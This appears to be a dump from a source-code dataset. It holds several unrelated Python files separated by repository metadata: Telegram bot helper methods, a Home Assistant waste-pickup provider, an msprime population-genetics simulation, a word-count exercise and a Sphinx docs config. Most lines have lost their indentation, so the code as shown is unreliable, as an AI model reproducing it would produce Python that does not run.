text = None
if msg:
if msg.text:
text = msg.text.markdown if msg.text else msg.caption.markdown if msg.caption else ""
message_type = Types.TEXT
content, message_type = self.GetMessageType(msg, include_text=False)
return note_name, text, message_type, content
async def IsAdmin(self, m: Message):
"""Check if we are an admin."""
if not m.from_user:
print(m) # getting from user as nonetype
return False
ranks = ["administrator", "creator"]
data = await self.get_chat_member(
chat_id=m.chat.id,
user_id=m.from_user.id
)
return False if not data.status in ranks else True
async def IsReply(self, msg: Message):
"""Check if the message is a reply to another user."""
        return msg.reply_to_message is not None
def ClearString(self, msg: str):
msg = re.sub(r"\<code\>(.*)\<\/code\>", "\g<1>", msg)
msg = re.sub(r"\<i\>(.*)\<\/i\>", "\g<1>", msg)
msg = re.sub(r"\<b\>(.*)\<\/b\>", "\g<1>", msg)
msg = re.sub(r"\<u\>(.*)\<\/u\>", "\g<1>", msg)
msg = re.sub(r"\*\*(.*)\*\*", "\g<1>", msg)
msg = re.sub(r"\_\_(.*)\_\_", "\g<1>", msg)
msg = re.sub(r"\`(.*)\`", "\g<1>", msg)
return msg
def QuoteHtml(self, text: str) -> str:
"""
Escape unexpected HTML characters.
:param text: Original text
:return:
"""
return html.escape(text, quote=False)
def TimeFormator(self, milliseconds: int) -> str:
""" converts seconds into human readable format """
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = (
((str(days) + "d, ") if days else "")
+ ((str(hours) + "h, ") if hours else "")
+ ((str(minutes) + "m, ") if minutes else "")
+ ((str(seconds) + "s, ") if seconds else "")
+ ((str(milliseconds) + "ms, ") if milliseconds else "")
)
return tmp[:-2]
def HumanBytes(self, size: int) -> str:
""" converts bytes into human readable format """
# https://stackoverflow.com/a/49361727/4723940
# 2**10 = 1024
if not size:
return ""
power = 2 ** 10
number = 0
dict_power_n = {0: " ", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
while size > power:
size /= power
number += 1
return str(round(size, 2)) + " " + dict_power_n[number] + "B"
async def ProgressForPyrogram(self, current, total, ud_type, message, start):
""" generic progress display for Telegram Upload / Download status """
now = time.time()
diff = now - start
if round(diff % 10.00) == 0 or current == total:
# if round(current / total * 100, 0) % 5 == 0:
percentage = current * 100 / total
speed = current / diff
elapsed_time = round(diff) * 1000
time_to_completion = round((total - current) / speed) * 1000
estimated_total_time = elapsed_time + time_to_completion
elapsed_time = self.TimeFormator(milliseconds=elapsed_time)
estimated_total_time = self.TimeFormator(milliseconds=estimated_total_time)
progress = "**[{0}{1}]** \n**Progress**: __{2}%__\n".format(
"".join(["●" for i in range(math.floor(percentage / 5))]),
"".join(["○" for i in range(20 - math.floor(percentage / 5))]),
round(percentage, 2),
)
tmp = progress + "**Done:** __{0} of {1}__\n**Speed:** __{2}/s__\n**ETA:** __{3}__\n".format(
self.HumanBytes(current),
self.HumanBytes(total),
self.HumanBytes(speed),
estimated_total_time if estimated_total_time != "" else "0 s",
)
try:
await message.edit(f"{ud_type}\n {tmp}")
except (MessageNotModified, FloodWait):
pass
def DictSizeInBytes(self, directory):
"""Returns the `directory` size in bytes."""
total = 0
try:
# print("[+] Getting the size of", directory)
for entry in os.scandir(directory):
if entry.is_file():
# if it's a file, use stat() function
total += entry.stat().st_size
elif entry.is_dir():
# if it's a directory, recursively call this function
total += self.DictSizeInBytes(entry.path)
except NotADirectoryError:
# if `directory` isn't a directory, get the file size then
return os.path.getsize(directory)
except PermissionError:
# if for whatever reason we can't open the folder, return 0
return 0
return total
def SizeFormat(self, b, factor=1024, suffix="B"):
for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
if b < factor:
return f"{b:.2f}{unit}{suffix}"
b /= factor
return f"{b:.2f}Y{suffix}"
def DictSize(self, location):
return self.SizeFormat(self.DictSizeInBytes(location))
def CleanHtml(self, raw_html):
cleanr = re.compile("<.*?>")
cleantext = re.sub(cleanr, "", raw_html)
return cleantext
def EscapeMarkdown(self, text):
escape_chars = r"\*_`\["
return re.sub(r"([%s])" % escape_chars, r"\\\1", text)
def MentionHtml(self, user_id, name):
return u'<a href="tg://user?id={}">{}</a>'.format(user_id, html.escape(name))
def MentionMarkdown(self, user_id, name):
return u'[{}](tg://user?id={})'.format(self.EscapeMarkdown(name), user_id)
def ParseButton(self, text):
markdown_note = text
prev = 0
note_data = ""
buttons = []
BTN_URL_REGEX = re.compile(r"(\[([^\[]+?)\]\(buttonurl:(?:/{0,2})(.+?)(:same)?\))")
for match in BTN_URL_REGEX.finditer(markdown_note):
# Check if btnurl is escaped
n_escapes = 0
to_check = match.start(1) - 1
while to_check > 0 and markdown_note[to_check] == "\\":
n_escapes += 1
to_check -= 1
# if even, not escaped -> create button
if n_escapes % 2 == 0:
# create a thruple with button label, url, and newline status
buttons.append((match.group(2), match.group(3), bool(match.group(4))))
note_data += markdown_note[prev:match.start(1)]
prev = match.end(1)
# if odd, escaped -> move along
else:
note_data += markdown_note[prev:to_check]
prev = match.start(1) - 1
else:
note_data += markdown_note[prev:]
return note_data, buttons
def BuildKeyboard(self, buttons):
keyb = []
keyb.clear()
for btn in buttons:
keyb.append(
InlineKeyboardButton(
btn[0],
callback_data=btn[1]
)
)
return keyb
    def TimeParser(self, start, end=None) -> str:
if end is None:
time_end = start
else:
time_end = end - start
month = time_end // 2678400
days = time_end // 86400
hours = time_end // 3600 % 24
minutes = time_end // 60 % 60
seconds = time_end % 60
times = ""
if month:
times += "{} month, ".format(month)
if days:
times += "{} days, ".format(days)
if hours:
times += "{} hours, ".format(hours)
if minutes:
times += "{} minutes, ".format(minutes)
if seconds:
times += "{} seconds".format(seconds)
if times == "":
times = "{} miliseconds".format(time_end)
return times
def ConvertSize(self, size_bytes):
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
def GetArg(self, m: Message):
msg = m.text
msg = msg.replace(" ", "", 1) if msg[1] == " " else msg
split = msg[1:].replace("\n", " \n").split(" ")
if " ".join(split[1:]).strip() == "":
return ""
return " ".join(split[1:])
def GetArgs(self, m: Message):
        msg = getattr(m, "text", None)  # None instead of unbound when the message has no text
if not msg:
return False
msg = msg.split(maxsplit=1)
if len(msg) <= 1:
return []
msg = msg[1]
try:
split = shlex.split(msg)
except ValueError:
return msg # Cannot split, let's assume that it's just one long message
return list(filter(lambda x: len(x) > 0, split))
def SpeedConvert(self, size):
power = 2**10
zero = 0
units = {
0: '',
1: 'Kb/s',
2: 'Mb/s',
3: 'Gb/s',
4: 'Tb/s'}
while size > power:
size /= power
zero += 1
return f"{round(size, 2)} {units[zero]}"
def GetReadableTime(self, seconds: int) -> str:
count = 0
ping_time = ""
time_list = []
time_suffix_list = ["s", "m", "h", "days"]
while count < 4:
count += 1
remainder, result = divmod(seconds, 60) if count < 3 else divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for x in range(len(time_list)):
time_list[x] = str(time_list[x]) + time_suffix_list[x]
if len(time_list) == 4:
ping_time += time_list.pop() + ", "
time_list.reverse()
ping_time += ":".join(time_list)
return ping_time
# generates thumbnail of download telegram media
def GenTgThumb(self, downloaded_file_name: str) -> str:
Image.open(downloaded_file_name).convert("RGB").save(downloaded_file_name)
metadata = extractMetadata(createParser(downloaded_file_name))
height = 0
if metadata.has("height"):
height = metadata.get("height")
img = Image.open(downloaded_file_name)
img.resize((320, height))
img.save(downloaded_file_name, "JPEG")
return downloaded_file_name
# get thumbnail of file if it exists
async def IsThumbExists(self, file_name: str):
thumb_image_path = os.path.join(self.TEMP_DICT, "thumb_image.jpg")
if os.path.exists(thumb_image_path):
thumb_image_path = os.path.join(self.TEMP_DICT, "thumb_image.jpg")
elif file_name is not None and file_name.lower().endswith(("mp4", "mkv", "webm")):
metadata = extractMetadata(createParser(file_name))
duration = 0
if metadata.has("duration"):
duration = metadata.get("duration").seconds
# get a random TTL from the duration
ttl = str(random.randint(0, duration - 1))
            thumb_image_path = self.GenTgThumb(await take_screen_shot(file_name, ttl))
else:
thumb_image_path = None
return thumb_image_path
# run shell commands
async def RunCommand(self, shell_command: List) -> (str, str):
process = await asyncio.create_subprocess_exec(
*shell_command,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
return t_response, e_response
# extract user id & first name from msg
async def ExtractUser(self, msg: Message) -> (int, str):
"""extracts the user from a message"""
user_id = None
user_first_name = None
reply = msg.reply_to_message
if reply:
if reply.from_user:
user_id = reply.from_user.id
user_first_name = reply.from_user.first_name
elif not reply:
if msg.from_user:
user_id = msg.from_user.id
user_first_name = msg.from_user.first_name
return user_id, user_first_name
# get chat type
def ChatType(self, m: Message):
return m.chat.type
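`HumanBytes` and `TimeFormator` above are pure arithmetic helpers: one walks powers of 1024, the other peels days/hours/minutes/seconds off a millisecond count with `divmod`. A standalone sketch of the same two calculations with sample values:

```python
def human_bytes(size: int) -> str:
    # walk powers of 1024, as HumanBytes above does
    power, number = 2 ** 10, 0
    units = {0: " ", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
    while size > power:
        size /= power
        number += 1
    return f"{round(size, 2)} {units[number]}B"

def time_formator(ms: int) -> str:
    # repeated divmod, as TimeFormator above does
    seconds, ms = divmod(int(ms), 1000)
    minutes, seconds = divmod(seconds, 60)
    hours, minutes = divmod(minutes, 60)
    days, hours = divmod(hours, 24)
    parts = [(days, "d"), (hours, "h"), (minutes, "m"), (seconds, "s"), (ms, "ms")]
    return ", ".join(f"{v}{u}" for v, u in parts if v)

print(human_bytes(5_368_709_120))  # 5.0 GiB
print(time_formator(90_061_000))   # 1d, 1h, 1m, 1s
```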
avg_line_length: 25.664975 | max_line_length: 97 | alphanum_fraction: 0.653481
cd0680c8e8001e04bf7fce86066358e6cf24e0ce | size: 13,576 | ext: py | lang: Python
repo_path: custom_components/afvalwijzer/provider/afvalwijzer.py | repo_name: ByKaj/homeassistant-config | repo_head_hexsha: 6ce207f763ba13346bdf5c463a8c3d77f45d175c | licenses: ["MIT"]
max_stars_count: 1 (2020-10-10T13:17:35.000Z to 2020-10-10T13:17:35.000Z) | max_issues_count: null | max_forks_count: null
from datetime import datetime, timedelta
import json
import requests
from ..const.const import _LOGGER, SENSOR_PROVIDER_TO_URL
class AfvalWijzer(object):
##########################################################################
# INIT
##########################################################################
def __init__(
self,
provider,
postal_code,
street_number,
suffix,
include_date_today,
default_label,
exclude_list,
):
self.provider = provider
self.postal_code = postal_code
self.street_number = street_number
self.suffix = suffix
self.include_date_today = include_date_today
self.default_label = default_label
self.exclude_list = exclude_list.strip().lower()
_providers = (
"mijnafvalwijzer",
"afvalstoffendienstkalender",
"rova",
)
if self.provider not in _providers:
print("Invalid provider: %s, please verify", self.provider)
if self.provider == "rova":
self.provider = "inzamelkalender.rova"
##########################################################################
# DATE CALCULATION TODAY, TOMORROW, DAY AFTER TOMORROW
##########################################################################
# today
self.today = datetime.today().strftime("%d-%m-%Y")
self.today_date = datetime.strptime(self.today, "%d-%m-%Y")
        # tomorrow
self.today_to_tomorrow = datetime.strptime(self.today, "%d-%m-%Y") + timedelta(
days=1
)
self.tomorrow = datetime.strftime(self.today_to_tomorrow, "%d-%m-%Y")
self.tomorrow_date = datetime.strptime(self.tomorrow, "%d-%m-%Y")
        # day after tomorrow
self.today_to_day_after_tomorrow = datetime.strptime(
self.today, "%d-%m-%Y"
) + timedelta(days=2)
self.day_after_tomorrow = datetime.strftime(
self.today_to_day_after_tomorrow, "%d-%m-%Y"
)
self.day_after_tomorrow_date = datetime.strptime(
self.day_after_tomorrow, "%d-%m-%Y"
)
# data collect
(
self._waste_data_raw,
self._waste_data_with_today,
self._waste_data_without_today,
) = self.get_waste_data_provider()
self._waste_data_custom = self.get_waste_data_custom()
self._waste_types_provider = self.get_waste_types_provider()
self._waste_types_custom = self.get_waste_types_custom()
##########################################################################
# GET WASTE DATA FROM PROVIDER
##########################################################################
def get_waste_data_provider(self):
try:
_LOGGER.debug(
"Connecting to the frontend (json data) of: %s", self.provider
)
url = SENSOR_PROVIDER_TO_URL["afvalwijzer_data_default"][0].format(
self.provider,
self.postal_code,
self.street_number,
self.suffix,
datetime.today().strftime("%Y-%m-%d"),
)
_LOGGER.debug("URL parsed: %s", url)
try:
raw_response = requests.get(url)
except requests.exceptions.RequestException as err:
raise ValueError(err)
try:
json_response = raw_response.json()
except ValueError:
raise ValueError("No JSON data received from " + url)
try:
waste_data_raw = (
json_response["ophaaldagen"]["data"]
+ json_response["ophaaldagenNext"]["data"]
)
except ValueError:
raise ValueError("Invalid and/or no JSON data received from " + url)
if not waste_data_raw:
_LOGGER.error("No waste data found!")
return
waste_data_with_today = {}
waste_data_without_today = {}
for item in waste_data_raw:
item_date = datetime.strptime(item["date"], "%Y-%m-%d")
item_name = item["type"].strip().lower()
if item_name not in self.exclude_list:
if item_name not in waste_data_with_today:
if item_date >= self.today_date:
waste_data_with_today[item_name] = item_date
for item in waste_data_raw:
item_date = datetime.strptime(item["date"], "%Y-%m-%d")
item_name = item["type"].strip().lower()
if item_name not in self.exclude_list:
if item_name not in waste_data_without_today:
if item_date > self.today_date:
waste_data_without_today[item_name] = item_date
try:
for item in waste_data_raw:
item_name = item["type"].strip().lower()
if item_name not in self.exclude_list:
if item_name not in waste_data_with_today.keys():
waste_data_with_today[item_name] = self.default_label
if item_name not in waste_data_without_today.keys():
waste_data_without_today[item_name] = self.default_label
except Exception as err:
_LOGGER.error("Other error occurred: %s", err)
return waste_data_raw, waste_data_with_today, waste_data_without_today
except Exception as err:
_LOGGER.error("Other error occurred: %s", err)
##########################################################################
# GENERATE DATA FOR CUSTOM SENSORS
##########################################################################
def get_waste_data_custom(self):
        # start counting with today's date or with tomorrow's date
if self.include_date_today.casefold() in ("true", "yes"):
date_selected = self.today_date
else:
date_selected = self.tomorrow_date
waste_data_custom = {}
today_multiple_items = []
tomorrow_multiple_items = []
day_after_tomorrow_multiple_items = []
next_item_multiple_items = []
##########################################################################
# GENERATE TODAY, TOMORROW, DAY AFTER TOMORROW SENSOR DATA
##########################################################################
try:
waste_data_provider = self._waste_data_with_today
waste_data_temp = {
key: value
for key, value in waste_data_provider.items()
if isinstance(value, datetime)
}
for key, value in waste_data_temp.items():
# waste type(s) today
if value == self.today_date:
if "today" in waste_data_custom.keys():
today_multiple_items.append(key)
waste_data_custom["today"] = ", ".join(today_multiple_items)
else:
today_multiple_items.append(key)
waste_data_custom["today"] = key
# waste type(s) tomorrow
if value == self.tomorrow_date:
if "tomorrow" in waste_data_custom.keys():
tomorrow_multiple_items.append(key)
waste_data_custom["tomorrow"] = ", ".join(
tomorrow_multiple_items
)
else:
tomorrow_multiple_items.append(key)
waste_data_custom["tomorrow"] = key
# waste type(s) day_after_tomorrow
if value == self.day_after_tomorrow_date:
if "day_after_tomorrow" in waste_data_custom.keys():
day_after_tomorrow_multiple_items.append(key)
waste_data_custom["day_after_tomorrow"] = ", ".join(
day_after_tomorrow_multiple_items
)
else:
day_after_tomorrow_multiple_items.append(key)
waste_data_custom["day_after_tomorrow"] = key
# set value to none if no value has been found
if "today" not in waste_data_custom.keys():
waste_data_custom["today"] = self.default_label
if "tomorrow" not in waste_data_custom.keys():
waste_data_custom["tomorrow"] = self.default_label
if "day_after_tomorrow" not in waste_data_custom.keys():
waste_data_custom["day_after_tomorrow"] = self.default_label
except Exception as err:
_LOGGER.error("Error occurred: %s", err)
##########################################################################
# GENERATE NEXT_ SENSOR DATA
##########################################################################
try:
waste_data_provider = self._waste_data_raw
waste_data_provider_past_removed = list(
filter(
lambda item: datetime.strptime(item["date"], "%Y-%m-%d")
>= date_selected,
waste_data_provider,
)
)
for item in range(len(waste_data_provider_past_removed)):
real_item = len(waste_data_provider_past_removed) - item - 1
if (
waste_data_provider_past_removed[real_item]["date"]
== self.default_label
):
del waste_data_provider_past_removed[real_item]
for item in range(len(waste_data_provider_past_removed)):
real_item = len(waste_data_provider_past_removed) - item - 1
if (
waste_data_provider_past_removed[real_item]["type"]
in self.exclude_list
):
del waste_data_provider_past_removed[real_item]
waste_data_provider_next_date = datetime.strptime(
waste_data_provider_past_removed[0]["date"], "%Y-%m-%d"
)
for item in waste_data_provider_past_removed:
item_date = datetime.strptime(item["date"], "%Y-%m-%d")
item_name = item["type"].strip().lower()
if item_date == waste_data_provider_next_date:
if "next_item" in waste_data_custom.keys():
if item_name not in waste_data_custom.keys():
next_item_multiple_items.append(item_name)
waste_data_custom["next_item"] = ", ".join(
next_item_multiple_items
)
else:
next_item_multiple_items.append(item_name)
waste_data_custom["next_item"] = item_name
# first upcoming pickup date of any waste type
waste_data_custom["next_date"] = waste_data_provider_next_date
# first upcoming waste type pickup in days
waste_data_custom["next_in_days"] = abs(
(self.today_date - waste_data_provider_next_date).days
)
# set value to none if no value has been found
if "next_date" not in waste_data_custom.keys():
waste_data_custom["next_date"] = self.default_label
if "next_in_days" not in waste_data_custom.keys():
waste_data_custom["next_in_days"] = self.default_label
if "next_item" not in waste_data_custom.keys():
waste_data_custom["next_item"] = self.default_label
except Exception as err:
_LOGGER.error("Error occurred: %s", err)
return waste_data_custom
##########################################################################
# GENERATE WASTE TYPES LIST FROM PROVIDER
##########################################################################
def get_waste_types_provider(self):
waste_data_provider = self._waste_data_without_today
waste_list_provider = list(waste_data_provider.keys())
return waste_list_provider
##########################################################################
# GENERATE SENSOR TYPES LIST FOR CUSTOM SENSORS
##########################################################################
def get_waste_types_custom(self):
waste_data_custom = self._waste_data_custom
waste_list_custom = list(waste_data_custom.keys())
return waste_list_custom
##########################################################################
# PROPERTIES FOR EXECUTION
##########################################################################
@property
def waste_data_with_today(self):
return self._waste_data_with_today
@property
def waste_data_without_today(self):
return self._waste_data_without_today
@property
def waste_data_custom(self):
return self._waste_data_custom
@property
def waste_types_provider(self):
return self._waste_types_provider
@property
def waste_types_custom(self):
return self._waste_types_custom
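`get_waste_data_provider` reduces the raw pickup list to the first listed date per waste type that falls on or after today. A self-contained sketch of that reduction over hypothetical pickup entries (assumed date-sorted, as the provider data is):

```python
from datetime import datetime

today = datetime(2022, 3, 14)

# Hypothetical raw entries in the provider's format
waste_data_raw = [
    {"date": "2022-03-14", "type": "GFT"},
    {"date": "2022-03-21", "type": "GFT"},
    {"date": "2022-03-16", "type": "Restafval"},
]

waste_data_with_today = {}
for item in waste_data_raw:
    item_date = datetime.strptime(item["date"], "%Y-%m-%d")
    item_name = item["type"].strip().lower()
    # keep only the first pickup on or after today for each waste type
    if item_name not in waste_data_with_today and item_date >= today:
        waste_data_with_today[item_name] = item_date

print(waste_data_with_today)
# {'gft': datetime.datetime(2022, 3, 14, 0, 0), 'restafval': datetime.datetime(2022, 3, 16, 0, 0)}
```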
avg_line_length: 40.284866 | max_line_length: 87 | alphanum_fraction: 0.507366
d3e18201ed56da9208c98a4ead1b4723927e52ff | size: 6,056 | ext: py | lang: Python
repo_path: simulation_scripts/msp_fiji_fluctuate.py | repo_name: g33k5p34k/PleistoDistR | repo_head_hexsha: b02b24b16995078c68a4e2b70f5f41e8bac68da2 | licenses: ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
'''
Made by Ethan Gyllenhaal (egyllenhaal@unm.edu)
Last updated 12 April 2022
Script for running a single msprime simulation for dynamic divergence between two islands (designed for parallel)
Takes in parameters for infile path, output path, alpha (# propagules per unit^2), and mean dispersal distance
Infile is comma delimited with header Interval,Distance,Kadavu_target,Viti_target,Kadavu_size,Viti_size
Outputs nucleotide diversity for each island and FST
calcParameters calculates gene flow and population size per interval given input file.
run_msprime is the method for running the simulation and calculating summary statistics
main is simply the driver for everything
'''
import os, sys, math, msprime as msp, numpy as np, re, allel, argparse, pandas as pd
# global for how many generations there are per interval
# assuming a generation time of 2 years and 5k years/interval
generation_interval = 2500
# global for population density per unit^2 (meter here)
density = 0.00001
def main():
# set up parser and arguments with ArgParse
parse = argparse.ArgumentParser(description = "Get simulation parameters")
parse.add_argument("-i", "--infile", type=str, help="Path to island information file")
parse.add_argument("-o", "--output", type=str, help="Path to output file")
parse.add_argument("-a", "--alpha", type=float, help="Value of alpha, propagules/unit^2")
parse.add_argument("-d", "--dispersal", type=float, help="Value of mean dispersal distance in default units")
args = parse.parse_args()
# assign arguments to variables
infile, outfile, alpha, dispersal = args.infile, args.output, args.alpha, args.dispersal
# calculate the population sizes and migration rates over time
# uses calcParameters method below, used as input for msprime
processed_data = calcParameters(infile, alpha, dispersal, density)
# amount of generations to run the simulation for
time = 200000
# calls msprime, assigns results to variables, and writes those to output
fst, div1, div2 = run_msprime(processed_data, time)
output = open(outfile, "a")
output.write(str(fst)+"\t"+str(div1)+"\t"+str(div2)+"\n")
output.close()
def run_msprime(params, time):
# set number of samples
samples=50
# determine the interval the split occurs at
split_int = time//generation_interval
# pairing indexes and rows for parameters generated by calcParameters
params = params.reset_index()
# Set up populations, with pop1 as Viti Levu and pop2 as Kadavu
demography = msp.Demography()
demography.add_population(name="pop1", initial_size=params["Viti_pop"][0])
demography.add_population(name="pop2", initial_size=params["Kad_pop"][0])
demography.add_population(name="anc_pop12", initial_size = params["Viti_pop"][split_int]+params["Kad_pop"][split_int])
demography.add_population_split(time=time, derived=["pop1","pop2"], ancestral="anc_pop12")
# add demographic events to change population sizes and migration rates per interval
for index, row in params.iterrows():
# determine the generation number of the interval change
gen = index * generation_interval
# change rate for each interval, forward time 1->2 (V->K), backward time 2->1 (K->V)
demography.add_migration_rate_change(time=gen, source="pop2", dest="pop1", rate=row["K2V"]/row["Kad_pop"])
# change the opposite rate for each interval
demography.add_migration_rate_change(time=gen, source="pop1", dest="pop2", rate=row["V2K"]/row["Viti_pop"])
# set the sizes for each population at a given interval
demography.add_population_parameters_change(time=gen, population="pop1", initial_size=row["Viti_pop"])
demography.add_population_parameters_change(time=gen, population="pop2", initial_size=row["Kad_pop"])
# sort the demographic events
demography.sort_events()
# Run the simulation to get tree sequences
trees=msp.sim_ancestry(samples={"pop1":samples, "pop2":samples},
demography=demography,
recombination_rate=1e-8,
sequence_length=1e7)
# Add mutations to treeseqs
mutation=msp.sim_mutations(trees, rate=2.3e-9)
# get haplotypes and genotypes from simulation
haplotypes = np.array(mutation.genotype_matrix())
positions = np.array([s.position for s in trees.sites()])
genotypes = allel.HaplotypeArray(haplotypes).to_genotypes(ploidy=2)
# calculate fst
fst = allel.stats.fst.average_weir_cockerham_fst(genotypes,[list(range(0,int(samples))),list(range(int(samples),samples*2))],10)[0]
# calculate nucleotide diversity
geno1 = genotypes.take(range(0,int(samples)),axis=1)
geno2 = genotypes.take(range(int(samples),int(samples*2)), axis=1)
acount1 = geno1.count_alleles()
acount2 = geno2.count_alleles()
div1 = allel.sequence_diversity(range(1,len(acount1)),acount1)
div2 = allel.sequence_diversity(range(1,len(acount2)),acount2)
# return the summary statistics
return(fst, div1, div2)
def calcParameters(infile, alpha, mean_disp, dens):
# read in PleistoDist output as a dataframe
dframe = pd.read_csv(infile, index_col=0)
# Calculate population densities
dframe["Viti_pop"] = dframe["Viti_size"] * density
dframe["Kad_pop"] = dframe["Kadavu_size"] * density
# BACKWARD TIME Viti -> Kadavu, i.e. forward Kadavu -> Viti
dframe["V2K"] = (alpha * dframe["Kadavu_size"]) * ((dframe["Viti_target"] * np.exp(-1 * (1/mean_disp) * dframe["Distance"]))/
(2 * math.pi * dframe["Distance"]))
# BACKWARD TIME Kadavu -> Viti, i.e. forward Viti -> Kadavu
dframe["K2V"] = (alpha * dframe["Viti_size"]) * ((dframe["Kadavu_target"] * np.exp(-1 * (1/mean_disp) * dframe["Distance"]))/
(2 * math.pi * dframe["Distance"]))
return dframe
if __name__ == '__main__':
main()
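`calcParameters` converts island area, target width, and inter-island distance into a per-interval migrant count through an exponential dispersal kernel, which `run_msprime` later divides by the destination population size to obtain a migration rate. A worked sketch of the V2K expression for one interval, using hypothetical values:

```python
import math

# Hypothetical single-interval inputs, for illustration only
alpha = 1e-4          # propagules per unit^2
mean_disp = 50_000.0  # mean dispersal distance
distance = 100_000.0  # inter-island distance
kadavu_size = 4.5e8   # Kadavu area
viti_target = 6.0e4   # target width presented by Viti Levu

# mirrors the V2K column: (alpha * Kadavu_size) * (Viti_target * exp(-d / mean_disp)) / (2 * pi * d)
v2k = (alpha * kadavu_size) * (
    (viti_target * math.exp(-(1 / mean_disp) * distance)) / (2 * math.pi * distance)
)
print(round(v2k, 2))  # ~581.56 migrants per generation for these example inputs
```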
avg_line_length: 48.063492 | max_line_length: 135 | alphanum_fraction: 0.694518
66478b79444d18de093fdc5e02effa1a6db2c612 | size: 257 | ext: py | lang: Python
repo_path: word-count/word_count.py | repo_name: ederst/exercism-python | repo_head_hexsha: 8791f145ff4ce1a3b78ac3566fbe428ce3a3bd7b | licenses: ["Unlicense"]
max_stars_count: 1 (2021-06-25T16:09:02.000Z to 2021-06-25T16:09:02.000Z) | max_issues_count: 1 (2021-05-17T23:45:29.000Z to 2021-05-17T23:46:01.000Z) | max_forks_count: null
from collections import Counter
from typing import Dict
import re
def count_words(sentence: str) -> Dict[str, int]:
    # this exact solution was suggested by the mentor (bobahop)
return Counter(re.findall(r"[a-z0-9]+(?:'[a-z]+)?", sentence.lower()))
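# Hedged usage sketch (added for illustration; the input sentence is hypothetical):
#   count_words("one fish two fish red fish blue fish")
#   -> Counter({'fish': 4, 'one': 1, 'two': 1, 'red': 1, 'blue': 1})
# The regex keeps lowercase alphanumerics plus internal apostrophes, so "don't stop"
# yields the words "don't" and "stop".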
| 28.555556 | 74 | 0.700389 |
18307df30e11f5cfd2680aedc54632202ffdea48 | 5,314 | py | Python | docs/conf.py | qqgg231/Adafruit_CircuitPython_SHT31D | bf53996fee22fa13ccb26c90e84ed7449474cab9 | ["MIT"] | null | null | null | docs/conf.py | qqgg231/Adafruit_CircuitPython_SHT31D | bf53996fee22fa13ccb26c90e84ed7449474cab9 | ["MIT"] | null | null | null | docs/conf.py | qqgg231/Adafruit_CircuitPython_SHT31D | bf53996fee22fa13ccb26c90e84ed7449474cab9 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
# Uncomment the below if you use native CircuitPython modules such as
# digitalio, micropython and busio. List the modules you use. Without it, the
# autodoc module docs will fail to generate with a warning.
# autodoc_mock_imports = ["micropython", "adafruit_bus_device"]
intersphinx_mapping = {'python': ('https://docs.python.org/3.4', None),'BusDevice': ('https://circuitpython.readthedocs.io/projects/busdevice/en/latest/', None),'Register': ('https://circuitpython.readthedocs.io/projects/register/en/latest/', None),'CircuitPython': ('https://circuitpython.readthedocs.io/en/latest/', None)}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Adafruit SHT31D Library'
copyright = u'2017 Jerry Needell'
author = u'Jerry Needell'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '.env', 'CODE_OF_CONDUCT.md']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
default_role = "any"
# If true, '()' will be appended to :func: etc. cross-reference text.
#
add_function_parentheses = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# If this is True, todo emits a warning for each TODO entry. The default is False.
todo_emit_warnings = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
try:
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path(), '.']
    except ImportError:
html_theme = 'default'
html_theme_path = ['.']
else:
html_theme_path = ['.']
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
html_favicon = '_static/favicon.ico'
# Output file base name for HTML help builder.
htmlhelp_basename = 'AdafruitSht31Librarydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Adafruitsht31Library.tex', u'Adafruitsht31 Library Documentation',
author, 'manual'),
]
